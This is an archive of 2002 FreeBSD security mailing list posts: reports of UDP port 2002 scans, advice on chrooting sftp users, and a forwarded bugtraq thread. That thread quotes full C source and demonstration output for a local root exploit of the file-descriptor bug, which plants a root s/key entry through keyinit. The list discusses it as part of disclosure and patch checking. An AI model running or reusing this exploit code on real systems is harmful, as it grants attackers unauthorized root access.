en-US; rv:1.1b) Gecko/20020721 X-Accept-Language: en-us, en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: Scans of port 2002 - globe service Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Starting this morning, I've noticed MANY failed attempts coming through for requests to UDP port 2002. Begin sample from logs: Aug 19 12:34:04 davinci /kernel: Connection attempt to UDP *myipaddress*:2002 from 212.154.26.10:2002 Aug 19 12:34:04 davinci /kernel: Connection attempt to UDP *myipaddress*:2002 from 210.188.196.40:2002 Aug 19 12:34:04 davinci /kernel: Connection attempt to UDP *myipaddress*:2002 from 202.158.39.190:2002 Aug 19 12:34:04 davinci /kernel: Connection attempt to UDP *myipaddress*:2002 from 63.217.26.26:2002 Aug 19 12:34:04 davinci /kernel: Connection attempt to UDP *myipaddress*:2002 from 63.217.26.32:2002 Aug 19 12:34:04 davinci /kernel: Connection attempt to UDP *myipaddress*:2002 from 203.187.15.21:2002 Aug 19 12:34:04 davinci /kernel: Connection attempt to UDP *myipaddress*:2002 from 194.193.195.70:2002 Aug 19 12:34:04 davinci /kernel: Connection attempt to UDP *myipaddress*:2002 from 212.204.227.201:2002 Aug 19 12:34:05 davinci /kernel: Connection attempt to UDP *myipaddress*:2002 from 202.206.100.38:2002 End sample from logs: From the time-stamps, it appears that ~100 hosts are making this request once every minute. Anyone else experiencing this behavior? I have noticed that all the hosts I checked using Netcraft were running some version of unix, mostly FreeBSD and all were running apache with PHP. -- ____________________________________________________ Curry Searle | Postmaster searle@unt.edu | Unix Hosts www.cas.unt.edu/~searle | Xiotech Support College of Arts & Sciences | Win32 Desktop & Server Computer Support Services | Network HW & Protocols To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 19 11: 3:19 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3417937B408 for ; Mon, 19 Aug 2002 11:03:11 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id D29AF43E3B for ; Mon, 19 Aug 2002 11:03:10 -0700 (PDT) (envelope-from owner-bugmaster@freebsd.org) Received: from freefall.freebsd.org (peter@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7JI3AJU010912 for ; Mon, 19 Aug 2002 11:03:10 -0700 (PDT) (envelope-from owner-bugmaster@freebsd.org) Received: (from peter@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7JI3A7J010907 for security@freebsd.org; Mon, 19 Aug 2002 11:03:10 -0700 (PDT) Date: Mon, 19 Aug 2002 11:03:10 -0700 (PDT) Message-Id: <200208191803.g7JI3A7J010907@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: peter set sender to owner-bugmaster@freebsd.org using -f From: FreeBSD bugmaster To: security@FreeBSD.org Subject: Current problem reports assigned to you Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Current FreeBSD problem reports No matches to your query To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 19 12:39:21 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6DDF237B401 for ; Mon, 19 Aug 2002 12:39:17 -0700 (PDT) Received: from localhost.neotext.ca (h24-70-64-200.ed.shawcable.net [24.70.64.200]) by mx1.FreeBSD.org (Postfix) with ESMTP id 26A8D43E3B for ; Mon, 19 Aug 2002 12:39:16 -0700 (PDT) (envelope-from campbell@babayaga.neotext.ca) Received: from babayaga.neotext.ca (localhost.neotext.ca [127.0.0.1]) by localhost.neotext.ca (8.12.5/8.11.0) with ESMTP id g7JJeDmZ001112; Mon, 19 Aug 2002 13:40:14 -0600 (MDT) (envelope-from campbell@babayaga.neotext.ca) From: "Duncan Patton a Campbell is Dhu" To: searle@unt.edu, freebsd-security@FreeBSD.ORG Subject: Re: Scans of port 2002 - globe service Date: Mon, 19 Aug 2002 13:40:13 -0600 Message-Id: <20020819194013.M75323@babayaga.neotext.ca> In-Reply-To: <3D612DB6.607@unt.edu> References: <3D612DB6.607@unt.edu> X-Mailer: Open WebMail 1.70 20020712 X-OriginatingIP: 127.0.0.1 (campbell) MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At first glance this looks like a distributed denial of service attack, possibly kicked off by the apache worm. Affect any but the most recent apache versions. Look for a .a or .uua files in /tmp to see of you are provoking it. Duncan Patton a Campbell is Duibh ;-) ---------- Original Message ----------- From: Curry Searle To: freebsd-security@FreeBSD.ORG Sent: Mon, 19 Aug 2002 12:41:10 -0500 Subject: Scans of port 2002 - globe service > Starting this morning, I've noticed MANY failed > attempts coming through for requests to UDP port 2002. > > Begin sample from logs: > > Aug 19 12:34:04 davinci /kernel: Connection attempt to > UDP *myipaddress*:2002 from 212.154.26.10:2002 > Aug 19 12:34:04 davinci /kernel: Connection attempt to > UDP *myipaddress*:2002 from 210.188.196.40:2002 > Aug 19 12:34:04 davinci /kernel: Connection attempt to > UDP *myipaddress*:2002 from 202.158.39.190:2002 > Aug 19 12:34:04 davinci /kernel: Connection attempt to > UDP *myipaddress*:2002 from 63.217.26.26:2002 > Aug 19 12:34:04 davinci /kernel: Connection attempt to > UDP *myipaddress*:2002 from 63.217.26.32:2002 > Aug 19 12:34:04 davinci /kernel: Connection attempt to > UDP *myipaddress*:2002 from 203.187.15.21:2002 > Aug 19 12:34:04 davinci /kernel: Connection attempt to > UDP *myipaddress*:2002 from 194.193.195.70:2002 > Aug 19 12:34:04 davinci /kernel: Connection attempt to > UDP *myipaddress*:2002 from 212.204.227.201:2002 > Aug 19 12:34:05 davinci /kernel: Connection attempt to > UDP *myipaddress*:2002 from 202.206.100.38:2002 > > End sample from logs: > > From the time-stamps, it appears that ~100 hosts are > making this request once every minute. Anyone else > experiencing this behavior? I have noticed that all > the hosts I checked using Netcraft were running some > version of unix, mostly FreeBSD and all were running > apache with PHP. > > -- > ____________________________________________________ > Curry Searle | Postmaster > searle@unt.edu | Unix Hosts > www.cas.unt.edu/~searle | Xiotech Support > College of Arts & Sciences | Win32 Desktop & Server > Computer Support Services | Network HW & Protocols > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the > message ------- End of Original Message ------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 19 16: 5:58 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 35A5837B400 for ; Mon, 19 Aug 2002 16:05:55 -0700 (PDT) Received: from smtpout.mac.com (smtpout.mac.com [204.179.120.89]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9292B43E42 for ; Mon, 19 Aug 2002 16:05:53 -0700 (PDT) (envelope-from wincentcolaiuta@mac.com) Received: from smtp-relay03.mac.com (smtp-relay03-en1 [10.13.10.222]) by smtpout.mac.com (8.12.1/8.10.2/1.0) with ESMTP id g7JN5rA8003742 for ; Mon, 19 Aug 2002 16:05:53 -0700 (PDT) Received: from asmtp02.mac.com (asmtp02-qfe3 [10.13.10.66]) by smtp-relay03.mac.com (8.12.1/8.12.1/1.0) with ESMTP id g7JN5qKN007786 for ; Mon, 19 Aug 2002 16:05:53 -0700 (PDT) Received: from localhost ([202.45.118.87]) by asmtp02.mac.com (Netscape Messaging Server 4.15) with ESMTP id H145HR00.H4H; Mon, 19 Aug 2002 16:05:51 -0700 Date: Tue, 20 Aug 2002 08:35:46 +0930 Subject: Re: Chroot environment for ssh Content-Type: text/plain; charset=ISO-8859-1; format=flowed Mime-Version: 1.0 (Apple Message framework v482) Cc: security@FreeBSD.ORG To: Philip Paeps From: Wincent Colaiuta In-Reply-To: <20020815134341.GO1144@juno.paeps.cx> Message-Id: <31BC65C5-B3C8-11D6-9471-003065C60B4C@mac.com> Content-Transfer-Encoding: quoted-printable X-Mailer: Apple Mail (2.482) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org El Thursday, 15 August, 2002, a las 11:13 PM, Philip Paeps escribi=F3: > I'm in the process of setting up a form of fileserver, and I'd like = for=20 > my > users to be able to work only in their home directories, not anywhere=20= > else. I > would like to use SSH for the connections, as opposed to FTP, but I=20 > don't want > users to be able to log into an interactive shell (only SCP/SFTP) and = I=20 > don't > want them to 'escape' out of their home directories. Use ssh2 from the ports collection: cd /usr/ports/security/ssh2 && make install In /usr/local/etc/ssh2/sshd2_config set the ChRootGroups and ChRootUsers=20= directives to chroot the group(s) and/or user(s) that are to have=20 ChRooted access. Turn off the default ssh (OpenSSH) by setting in /etc/rc.conf: sshd_enable=3D"NO" Start the new ssh: /usr/local/etc/rc.d/sshd.sh start When you create the user's account, make sure the shell is set to=20 /bin/nologin or something similar. With this setup, they can sftp in and are chroot to the home dir, and=20 they can't get a shell when they connect via ssh. In my opinion, OpenSSH should have this feature. We are told not to use=20= ftp because of clear-text passwords, so we have to use ssh/sftp, but=20 when we do that we can no longer chroot people to their home dirs! And=20= if we're not careful, we end up giving them a login shell. Using ssh2=20 from the ports gets around this limitation, but just check the licence=20= before you install to make sure that you qualify (otherwise it's not=20 free). Cheers :-) Wincent To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 19 16: 9:49 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7726D37B4B9 for ; Mon, 19 Aug 2002 16:09:32 -0700 (PDT) Received: from cage.simianscience.com (cage.simianscience.com [64.7.134.1]) by mx1.FreeBSD.org (Postfix) with ESMTP id 13F2B43E3B for ; Mon, 19 Aug 2002 16:09:13 -0700 (PDT) (envelope-from mike@sentex.net) Received: from house.sentex.net (fcage [192.168.0.2]) by cage.simianscience.com (8.12.5/8.12.5) with ESMTP id g7JN7wmb034653 for ; Mon, 19 Aug 2002 19:07:59 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <5.1.0.14.0.20020819190243.03854300@192.168.0.12> X-Sender: mdtancsa@192.168.0.12 X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Mon, 19 Aug 2002 19:06:09 -0400 To: security@freebsd.org From: Mike Tancsa Subject: Fwd: Freebsd FD exploit Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="=====================_941369247==_" X-Virus-Scanned: amavis-20020220 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --=====================_941369247==_ Content-Type: text/plain; charset="us-ascii"; format=flowed From bugtraq for those of you not on bugtraq. I take it this was addressed in FreeBSD-SA-02:23.stdio ? ---Mike >Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm >List-Id: >List-Post: >List-Help: >List-Unsubscribe: >List-Subscribe: >Delivered-To: mailing list bugtraq@securityfocus.com >Delivered-To: moderator for bugtraq@securityfocus.com >From: "dvdman" >To: >Subject: Freebsd FD exploit >Date: Sun, 18 Aug 2002 21:01:13 -0400 >X-Mailer: Microsoft Outlook Express 6.00.2600.0000 >X-Spam-Status: No, hits=0.0 required=5.0 tests= version=2.11 >X-Virus-Scanned: amavis-20020220 > >/* Proof Of Concept exploit for the Freebsd file descriptors bug. Freebsd >thought they fixed this months ago well guess again :P Thanks to the >Freebsd kernel you may now enjoy local root on all freebsd <=4.6 ;) */ > > --=====================_941369247==_ Content-Type: text/plain; charset="us-ascii" /* Proof Of Concept exploit for the Freebsd file descriptors bug. Freebsd thought they fixed this months ago well guess again :P Thanks to the Freebsd kernel you may now enjoy local root on all freebsd <=4.6 ;) */ /* *I AM FREE* *I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE* */ DVDMAN(DVDMAN@L33TSECURITY.COM) Visit Us: irc.efnet.org #l33tsecurity www.l33tsecurity.com And Freebsd thought they fixed this :P GREETS: thanks phased for skeys from iosmash.c :) thanks all of #l33tsecurity for support thanks Georgi Guninski for ideas Details: Several months ago Joost Pol made public almost the same problem. FreeBSD fixed it, but the patch does not cover all the cases. In some cases the kernel closes fds 0..2 after they are assigned to /dev/null, leaving the system open to an attack. If a +s file is execed and fds 0..2 are opened to /proc/curproc/{special} then the kernel forcefully closes them and open() then reuses them. this program makes the following skeys valid 95: CARE LIVE CARD LOFT CHIC HILL 96: TESS OIL WELD DUD MUTE KIT 97: DADE BED DRY JAW GRAB NOV 98: MASS OAT ROLL TOOL AGO CAM 99: DARK LEW JOLT JIVE MOS WHO PROOF: [dvdman@xxxx:~]$ uname -a FreeBSD xxx.xx 4.6-STABLE FreeBSD 4.6-STABLE #1: Sat Jul27 20:16:20 GMT 2002 dvdman@xxxx:/usr/obj/usr/src/sys/xxx i386 [dvdman@xxxx:~]$ gcc iosmash2.c [dvdman@xxxx:~]$ ./a.out Adding dvdman: ctrl-c [dvdman@xxxx:~]$ su s/key 98 snosoft2 Password: [root@xxxx:/home/dvdman]# */ #include #include #include #include int main(int argc, char *argv[]) { int f; int ret; while(dup(1) != -1) {}; close(2); close(3); f=open("/proc/curproc/mem",O_WRONLY); if (f==-1) fprintf(stdout,"Error in open /proc\n"); fprintf(stdout,"press ctrl-c when adding..."); ret = execl("/usr/bin/keyinit","\nroot 0099 snosoft2 6f648e8bd0e2988a Apr 23,2666 01:02:03\n",0); if(ret == -1) { fprintf(stdout,"execl() failed: %s (%d)\n",strerror(errno),errno); } } --=====================_941369247==_ Content-Type: text/plain; charset="us-ascii"; format=flowed -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Sentex Communications, mike@sentex.net Providing Internet since 1994 www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike --=====================_941369247==_-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 19 16:18:23 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A714F37B400 for ; Mon, 19 Aug 2002 16:18:21 -0700 (PDT) Received: from mailhost.ghosthound.net (dsl081-070-149.sfo1.dsl.speakeasy.net [64.81.70.149]) by mx1.FreeBSD.org (Postfix) with ESMTP id 58A2743E4A for ; Mon, 19 Aug 2002 16:18:21 -0700 (PDT) (envelope-from ricci@ghosthound.net) Received: by mailhost.ghosthound.net (Postfix, from userid 1001) id ACBA5392CE; Mon, 19 Aug 2002 16:21:30 -0700 (PDT) Date: Mon, 19 Aug 2002 16:21:30 -0700 From: Eric Hall To: security@freebsd.org Subject: Re: Fwd: Freebsd FD exploit Message-ID: <20020819162130.D7137@ghosthound.net> References: <5.1.0.14.0.20020819190243.03854300@192.168.0.12> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <5.1.0.14.0.20020819190243.03854300@192.168.0.12>; from mike@sentex.net on Mon, Aug 19, 2002 at 07:06:09PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, Aug 19, 2002 at 07:06:09PM -0400, Mike Tancsa wrote: > > From bugtraq for those of you not on bugtraq. I take it this was > addressed in FreeBSD-SA-02:23.stdio ? > It worked fine on a 4.5-RELEASE-p4 box, failed on a 4.6.1-RELEASE-p10 box. -eric To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 19 17: 7:17 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1B8AD37B400 for ; Mon, 19 Aug 2002 17:07:15 -0700 (PDT) Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by mx1.FreeBSD.org (Postfix) with ESMTP id A143843E3B for ; Mon, 19 Aug 2002 17:07:14 -0700 (PDT) (envelope-from nectar@nectar.cc) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id 03C3040; Mon, 19 Aug 2002 19:07:14 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g7K07DfL055585; Mon, 19 Aug 2002 19:07:13 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g7K07DaT055584; Mon, 19 Aug 2002 19:07:13 -0500 (CDT) Date: Mon, 19 Aug 2002 19:07:13 -0500 From: "Jacques A. Vidrine" To: Mike Tancsa Cc: security@freebsd.org Subject: Re: Fwd: Freebsd FD exploit Message-ID: <20020820000713.GB55497@madman.nectar.cc> References: <5.1.0.14.0.20020819190243.03854300@192.168.0.12> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <5.1.0.14.0.20020819190243.03854300@192.168.0.12> User-Agent: Mutt/1.4i X-Url: http://www.nectar.cc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, Aug 19, 2002 at 07:06:09PM -0400, Mike Tancsa wrote: > > From bugtraq for those of you not on bugtraq. I take it this was > addressed in FreeBSD-SA-02:23.stdio ? In revision 1.2 of FreeBSD-SA-02:23.stdio. My reply on bugtraq hasn't made it through yet. Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 19 17:19:44 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2920337B400; Mon, 19 Aug 2002 17:19:42 -0700 (PDT) Received: from omta01.mta.everyone.net (sitemail3.everyone.net [216.200.145.37]) by mx1.FreeBSD.org (Postfix) with ESMTP id CD54743E4A; Mon, 19 Aug 2002 17:19:41 -0700 (PDT) (envelope-from mfrd@attitudex.com) Received: from sitemail.everyone.net (dsnat [216.200.145.62]) by omta01.mta.everyone.net (Postfix) with ESMTP id 697FC1C4F2F; Mon, 19 Aug 2002 17:19:41 -0700 (PDT) Received: by sitemail.everyone.net (Postfix, from userid 99) id 44537395A; Mon, 19 Aug 2002 17:19:41 -0700 (PDT) Content-Type: text/plain Content-Disposition: inline Content-Transfer-Encoding: 7bit Mime-Version: 1.0 X-Mailer: MIME-tools 5.41 (Entity 5.404) Date: Mon, 19 Aug 2002 17:19:41 -0700 (PDT) From: Muhammad Faisal Rauf Danka To: security@freebsd.org, "Jacques A. Vidrine" Subject: Re: Fwd: Freebsd FD exploit Reply-To: mfrd@attitudex.com X-Originating-Ip: [202.5.134.230] Message-Id: <20020820001941.44537395A@sitemail.everyone.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Mr Jacques A. Vidrine , It has. :) http://www.der-keiler.de/Mailing-Lists/securityfocus/bugtraq/2002-08/0290.html Regards, --------- Muhammad Faisal Rauf Danka Head of GemSEC / Chief Technology Officer Gem Internet Services (Pvt) Ltd. web: www.gem.net.pk --- "Jacques A. Vidrine" wrote: >On Mon, Aug 19, 2002 at 07:06:09PM -0400, Mike Tancsa wrote: >> >> From bugtraq for those of you not on bugtraq. I take it this was >> addressed in FreeBSD-SA-02:23.stdio ? > >In revision 1.2 of FreeBSD-SA-02:23.stdio. > >My reply on bugtraq hasn't made it through yet. > >Cheers, >-- >Jacques A. Vidrine http://www.nectar.cc/ >NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos >jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message _____________________________________________________________ --------------------------- [ATTITUDEX.COM] http://www.attitudex.com/ --------------------------- _____________________________________________________________ Promote your group and strengthen ties to your members with email@yourgroup.org by Everyone.net http://www.everyone.net/?btn=tag To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 19 18:20:59 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id EA23E37B400 for ; Mon, 19 Aug 2002 18:20:55 -0700 (PDT) Received: from mail.texas-shooters.com (bdsl.66.12.242.27.gte.net [66.12.242.27]) by mx1.FreeBSD.org (Postfix) with ESMTP id F1B7543E9C for ; Mon, 19 Aug 2002 18:20:54 -0700 (PDT) (envelope-from el_kab0ng@mail.texas-shooters.com) Received: (from root@localhost) by mail.texas-shooters.com (8.12.1/8.12.1) id g7K1AYq9019680 for freebsd-security@freebsd.org; Mon, 19 Aug 2002 20:10:34 -0500 (CDT)?g (envelope-from el_kab0ng@mail.texas-shooters.com)œ Received: from mail.texas-shooters.com (localhost [127.0.0.1]) by mail.texas-shooters.com (8.12.1/3.1.3.3.7) with ESMTP id g7K1AVBu019673 for ; Mon, 19 Aug 2002 20:10:32 -0500 (CDT)?g (envelope-from el_kab0ng@mail.texas-shooters.com) Received: (from el_kab0ng@localhost) by mail.texas-shooters.com (8.12.1/8.12.1/Submit) id g7K1AV17019672 for freebsd-security@freebsd.org; Mon, 19 Aug 2002 20:10:31 -0500 (CDT)?g (envelope-from el_kab0ng) Date: Mon, 19 Aug 2002 20:10:31 -0500 From: Shortalones To: freebsd-security@freebsd.org Subject: Re: Fwd: Freebsd FD exploit Message-ID: <20020819201031.A19548@mail.texas-shooters.com> References: <5.1.0.14.0.20020819190243.03854300@192.168.0.12> <20020819162130.D7137@ghosthound.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020819162130.D7137@ghosthound.net>; from freebsd-security@darkart.com on Mon, Aug 19, 2002 at 04:21:30PM -0700 X-righteous-weapon: AK-47, of course. X-planation: Happiness is a warm gun. X-bitch: I miss my ex-wife... but with this new laser sight... X-website: http://www.texas-shooters.com X-Virus-Scanned: by AMaViS perl-11 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org patched or no? Before this code was released a friend of mine spruced it up for his own uses, with the patch it prevented this problem. Are you saying we now have to wait for yet another patch to get this stdio stuff fixed? Today freebsd-security@darkart.com spoke in tongue: ** On Mon, Aug 19, 2002 at 07:06:09PM -0400, Mike Tancsa wrote: ** > ** > From bugtraq for those of you not on bugtraq. I take it this was ** > addressed in FreeBSD-SA-02:23.stdio ? ** > ** ** It worked fine on a 4.5-RELEASE-p4 box, failed on a 4.6.1-RELEASE-p10 box. ** ** ** -eric ** ** ** To Unsubscribe: send mail to majordomo@FreeBSD.org ** with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 19 19:27:37 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 42E5037B400 for ; Mon, 19 Aug 2002 19:27:35 -0700 (PDT) Received: from obsidian.sentex.ca (obsidian.sentex.ca [64.7.128.101]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8115443E6E for ; Mon, 19 Aug 2002 19:27:34 -0700 (PDT) (envelope-from mike@sentex.net) Received: from simian.sentex.net (pyroxene.sentex.ca [199.212.134.18]) by obsidian.sentex.ca (8.12.5/8.12.5) with ESMTP id g7K2RWCo094424; Mon, 19 Aug 2002 22:27:32 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <5.1.1.6.0.20020819222713.0413e2b0@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca X-Mailer: QUALCOMM Windows Eudora Version 5.1.1 Date: Mon, 19 Aug 2002 22:27:56 -0400 To: Shortalones , freebsd-security@FreeBSD.ORG From: Mike Tancsa Subject: Re: Fwd: Freebsd FD exploit In-Reply-To: <20020819201031.A19548@mail.texas-shooters.com> References: <20020819162130.D7137@ghosthound.net> <5.1.0.14.0.20020819190243.03854300@192.168.0.12> <20020819162130.D7137@ghosthound.net> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: By Sentex Communications (obsidian/20020220) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 08:10 PM 19/08/2002 -0500, Shortalones wrote: >Are you saying we now have to wait for yet another patch to get this >stdio stuff fixed? Have a look at the advisory as it answers this question. ---Mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 19 22:55: 3 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3E69537B400 for ; Mon, 19 Aug 2002 22:55:00 -0700 (PDT) Received: from c7.campus.utcluj.ro (c7.campus.utcluj.ro [193.226.6.226]) by mx1.FreeBSD.org (Postfix) with SMTP id 63C3B43E7B for ; Mon, 19 Aug 2002 22:54:58 -0700 (PDT) (envelope-from veedee@c7.campus.utcluj.ro) Received: (qmail 53776 invoked by uid 1008); 20 Aug 2002 05:55:04 -0000 Date: Tue, 20 Aug 2002 08:55:04 +0300 From: veedee@c7.campus.utcluj.ro To: Eric Hall Cc: security@freebsd.org Subject: Re: Fwd: Freebsd FD exploit Message-ID: <20020820085504.A53761@c7.campus.utcluj.ro> References: <5.1.0.14.0.20020819190243.03854300@192.168.0.12> <20020819162130.D7137@ghosthound.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20020819162130.D7137@ghosthound.net>; from freebsd-security@darkart.com on Mon, Aug 19, 2002 at 04:21:30PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, Aug 19, 2002 at 04:21:30PM -0700, Eric Hall wrote: > On Mon, Aug 19, 2002 at 07:06:09PM -0400, Mike Tancsa wrote: > > From bugtraq for those of you not on bugtraq. I take it this was > > addressed in FreeBSD-SA-02:23.stdio ? > It worked fine on a 4.5-RELEASE-p4 box, failed on a 4.6.1-RELEASE-p10 box. Also failed on a 4.6-PRERELEASE. -- Radu Bogdan RUSU | veedee@c7.campus.utcluj.ro NSA/P @ campus.utcluj.ro | http://c7.campus.utcluj.ro/~veedee To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 20 2:25:52 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7EA6B37B400 for ; Tue, 20 Aug 2002 02:25:46 -0700 (PDT) Received: from inet-com.net (proxied.internet-pipeline.net [199.105.112.202]) by mx1.FreeBSD.org (Postfix) with SMTP id 52C8B43E42 for ; Tue, 20 Aug 2002 02:25:45 -0700 (PDT) (envelope-from mailer@inet-com.net) From: "Net Solutions" To: "Security" Subject: Nuevo Ruteador Linksys con Net2Phone Date: Tue, 20 Aug 2002 04:24:32 -0500 MIME-Version: 1.0 X-Priority: 3 X-MSMail-Priority: Normal Message-ID: <300091843454205@inet-com.net> Reply-To: "Net Solutions" Organization: Net Solutions X-Mailer: Internet Mail Service Content-Type: multipart/alternative; boundary="----_NextPart_311434118387611" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: 